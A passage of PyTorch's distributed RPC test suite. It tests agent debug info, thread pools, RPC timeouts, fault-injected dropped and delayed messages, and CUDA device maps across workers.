while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
# use a barrier to prevent messages sent during shutdown occupies the
# only thread on callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
@dist_init
def test_process_group_debug_info(self):
rpc.enable_gil_profiling(True)
initialize_pg(self.file_init_method, self.rank, self.world_size)
NUM_THREAD = self.rpc_backend_options.num_send_recv_threads
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# for the above check, add a barrier to ensure that another worker
# cannot send a request before we check num_idle_threads, since we'd
# use up an idle thread if we start processing that request.
dist.barrier()
dst_rank = (self.rank + 1) % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank), set_and_check_done, args=(dst_rank,)
)
# blocks until the request arrives
self.assertEqual(self.rank, VALUE_FUTURE.result())
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertGreaterEqual(float(info["agent.gil_average_wait_time_us"]), 0)
self.assertEqual(int(info["agent.num_pending_requests"]), 1)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
num_idle_threads = int(info["agent.num_idle_threads"])
# as we cannot know for sure whether the send thread has returned, there
# might be either 1 or 2 busy threads
self.assertTrue(num_idle_threads in [NUM_THREAD - 1, NUM_THREAD - 2])
# add a barrier to make sure the request is not finished before checking
# num_pending_requests
dist.barrier()
DONE_FUTURE.set_result(self.rank)
self.assertEqual(dst_rank, fut.wait())
# add a barrier to make sure the dst_rank has finished processing the
# request
dist.barrier()
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
for retry in range(3):
# even if the future has completed, there is no guarantee that
# the local send/recv threads would have finished. We try three
# times. (NB: this might potentially be flaky. If flakiness does
# occur, then we have to relax the assert.)
info = rpc.api._get_current_rpc_agent().get_debug_info()
if int(info["agent.num_idle_threads"]) == NUM_THREAD:
break
time.sleep(0.1)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# add a barrier to make sure SHUTDOWN message is not sent
dist.barrier()
@dist_init(setup_rpc=False)
def test_set_and_get_num_send_recv_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing ProcessGroupRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout,
)
class ProcessGroupAgentCudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_cuda(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(3, 3).cuda(0)
t2 = torch.rand(3, 3).cuda(1)
t3 = torch.rand(3, 3)
# cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t2))
# mix of cpu and cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t3))
# gpu tensor list as args fails.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._gpu_tensor_list_arg, args=([t1, t2]))
# cuda tensors as return values fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor, args=())
# cuda tensors as a list of return value fails
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor_list, args=())
# Sending to self should fail too.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(worker_name(self.rank), torch.add, args=(t1, t2))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
